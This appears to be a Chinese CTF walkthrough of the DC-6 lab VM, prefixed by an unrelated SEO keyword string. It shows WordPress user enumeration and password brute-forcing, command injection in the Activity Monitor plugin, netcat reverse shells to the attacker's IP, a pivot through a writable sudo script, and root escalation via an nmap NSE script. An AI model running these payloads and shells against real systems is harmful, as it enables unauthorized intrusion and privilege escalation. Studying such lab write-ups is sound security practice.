怎么免费做网站视频教学,音乐主题的网站设计,宁波seo营销技巧,网站建设的步骤以及流程目录 前期准备
一、渗透测试
1.IP地址查询
2.端口信息搜寻
3.网页信息搜集
wappalyzer WPScan
反弹shell
graham用户
反弹出jens的shell
nmap提权 二、总结 前期准备
攻击机#xff1a; kali windows11
靶机#xff1a;DC-6靶机#xff08;调至NAT模式#xff0…目录 前期准备
一、渗透测试
1.IP地址查询
2.端口信息搜寻
3.网页信息搜集
wappalyzer WPScan
反弹shell
graham用户
反弹出jens的shell
nmap提权 二、总结 前期准备
攻击机 kali windows11
靶机DC-6靶机调至NAT模式
一、渗透测试
1.IP地址查询
┌──(root㉿kali)-[~]
└─# arp-scan -l通过比较MAC地址可以得到靶机的IP地址为 192.168.105.164
2.端口信息搜寻
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.105.164可以看到又开了SSH后面应该又要登录
3.网页信息搜集
访问靶机的80端口 看起来又被重定向掉了还记得之前打靶机的经验尝试去改hosts文件
到C:\Windows\System32\drivers\etc 下修改hosts文件使用Notepad打开 保存下网页就能够正常访问了 wappalyzer WPScan
看到一个很熟悉的cms——WordPress这是我们之前打过的一个cms并且还记得相应的工具WPScan。直接上网上搜发现了WordPress 5.1.1 的漏洞。边看看网页边用dirseach扫一下目录。但是由于我们是在windows的hosts文件中改的重定向而用wpscan扫网站时用的是kali所以还应该将kali中的hosts文件修改一下在 /etc/hosts ┌──(root㉿kali)-[~]
└─# wpscan --url http://wordy -e u成功扫出来了一些账号名保存为user.txt然后尤其关注登录页面 以及用dirsearch扫出来一些目录 先尝试到登录界面去 /wp-login.php 这里缺密码怎么办之前用到的工具是Cewl进行爬取从而得到密码字典这里也可以试试 成功得到一些密码保存为passwds.txt 然后使用WPScan进行网站登录爆破
┌──(root㉿kali)-[~/dc-6]
└─# wpscan --url http://wordy -U users.txt -P passwds.txt
可惜这样并不能够爆破成功密码没匹配上。。。看了别的师傅的wp才知道官网给了密码的提示 提示我们用kali中的字典并匹配含k01这样的密码在该目录下 发现rockyou还是个压缩包先解压得到rockyou.txt文件
┌──(root㉿kali)-[/usr/share/wordlists]
└─# gzip rockyou.txt.gz -d
先回到dc-6目录根据官网提示给的命令得到密码字典
┌──(root㉿kali)-[~/dc-6]
└─# cat /usr/share/wordlists/rockyou.txt | grep k01 passwds.txt然后再用wpscan进行爆破
┌──(root㉿kali)-[~/dc-6]
└─# wpscan --url http://wordy -U users.txt -P passwds.txt
最终只得到了一个账号 mark helpdesk01 直接登录 好的现在想一下如何getshell(用mark直接ssh登录发现是不行的权限不够)getshell可以通过命令执行弹一个shell或者是得到别的账户密码再次尝试SSH
1首先可以去看看网页的功能对一些可能的功能点进行测试
2可以看看WordPress 5.1.1 的历史漏洞看看是否能够被利用
首先还是来看看WordPress 5.1.1 的漏洞主要流传的是CSRF-to-RCE的那个漏洞 但看起来并不能够用于该靶机只能在网页上找功能点了而且一般来说找的应该是插件的漏洞了看看这里有哪几个插件 主要是这两个插件 看看有没有什么历史漏洞 可以看到百度上成功搜到了 Activity Monitor的历史漏洞复现一下看看 这个地方看可以输入IP和以前遇到的CTF题有点像,当我输入127.0.0.1 | ls -l 时发现不能输入了这里应该是有长度限制看看是不是前端的长度限制 尝试只修改前端的检查试试将其改为100 可以看到命令直接执行了接下来弹个shell
反弹shell
现在kali上打开监听
nc -lvp 5555
然后在IP处输入
127.0.0.1 | nc 192.168.105.148 5555 -e /bin/bash 点击执行就成功getshell了 然后用python开启交互式终端
python -c import pty;pty.spawn(/bin/bash)
再就是到提权了先试试以往的提权方法
www-datadc-6:/var/www/html$ find / -perm -us -type f 2/dev/null
find / -perm -us -type f 2/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping然后直接问AI “请问哪些可以用于suid漏洞提权” 但是看起来都不能利用再试试 sudo -l显示需要输入密码这个密码也暂时是不知道的只能再去看看别的一些用户了去home目录下
www-datadc-6:/home$ ls
ls
graham jens mark sarah看看各个用户下面有什么说不定就有旧密码可以用于爆破
www-datadc-6:/home/jens$ ls
ls
backups.sh有到一个shell执行程序看看是用来干嘛的
www-datadc-6:/home/jens$ cat backups.sh
cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
专门是用于解压 /var/www/html下的 backups.tar.gz的看起来就是打包网站的先放这里继续看mark目录下的stuff
www-datadc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarahs farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarahs replacement这里写了一系列的事项类似于一个flag 恢复超空间驱动器的全部功能需要和jens聊聊 为sarah的告别派对买礼物 加新用户graham - 密码为 GSo7isUM1D4 - 已完成 申请 OSCP 课程 为接替sarah工作的人买一台新笔记本电脑 此外在sarah目录下并没有找到文件但是事项中毕竟给了graham的密码另开一个终端看看ssh能不能登录上
graham用户 成功登录上看看graham能否提权
grahamdc-6:/home$ sudo -l
Matching Defaults entries for graham on dc-6:env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh此时输入 sudo -l 就有反应了用到的就是之前看到的那个执行程序若想要无密码执行这个文件需要用jens的身份 先想想需要用这个程序干什么再想想怎么用。这个程序最多让我们获得jens的shell既然这样的话不妨尝试通过这个程序登上jens的账户。尝试写入反弹shell
反弹出jens的shell
grahamdc-6:/home/jens$ echo nc 192.168.105.148 5556 -e /bin/bash backups.sh再打开kali的监听
┌──(root㉿kali)-[~]
└─# nc -lvp 5556
然后用jens的身份运行该文件
grahamdc-6:/home/jens$ sudo -u jens ./backups.sh此时就成功获得jens用户的shell了此时再看jens用户能不能提权
jensdc-6:~$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap看到这里有nmap并且也是免密码运行的
jensdc-6:/usr/bin$ ls -l nmap
ls -l nmap
-rwxr-xr-x 1 root root 2838168 Dec 22 2016 nmap发现是root权限的那就直接拿nmap来试试提权了去百度搜索有关nmap的提权方式发现有两种
nmap提权 1低版本的nmap提权 利用nmap的--interactive 进入交互式命令行执行然后执行!/bin/bash就行 2高版本的nmap提权首先将提权命令写入脚本中利用--script执行脚本 echo os.execute(/bin/bash) get_root.nse sudo nmap --scriptget_root 这里应该就是用第二种了
jensdc-6:~$ touch get_root.nse
touch get_root.nse
jensdc-6:~$ ls
ls
backups.sh backups.tar.gz get_root.nse
jensdc-6:~$ echo os.execute(/bin/bash) get_root.nse
echo os.execute(/bin/bash) get_root.nse
jensdc-6:~$ cat get_root.nse
cat get_root.nse
os.execute(/bin/bash)
成功写入接下来运行
jensdc-6:~$ sudo nmap --scriptget_root.nse
sudo nmap --scriptget_root.nseStarting Nmap 7.40 ( https://nmap.org ) at 2025-02-14 20:52 AEST
rootdc-6:/home/jens#成功提权到root
rootdc-6:~# cat theflag.txtYb dP 888888 88 88 8888b. dPYb 88b 88 888888 d8bYb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8PYbdPYbdP 88 88 .o 88 .o 8I dY Yb dP 88 Y88 88 YP YP 888888 88ood8 88ood8 8888Y YbodP 88 Y8 888888 (8)Congratulations!!!Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via DCAU7. 二、总结
1本次学习了nmap的提权方式并且温习了下WPScan的用法相比于主动去找插件的漏洞感觉WPScan应该也能扫出来感觉
